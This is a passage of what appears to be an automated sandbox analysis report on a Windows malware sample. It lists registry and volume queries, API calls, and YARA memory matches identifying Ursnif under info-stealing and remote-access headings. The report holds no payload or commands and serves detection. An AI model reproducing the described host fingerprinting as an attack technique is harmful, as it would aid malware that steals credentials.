Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E174828 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 2_2_6E174828
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E183009 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 2_2_6E183009
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E141F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 3_2_6E141F10
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY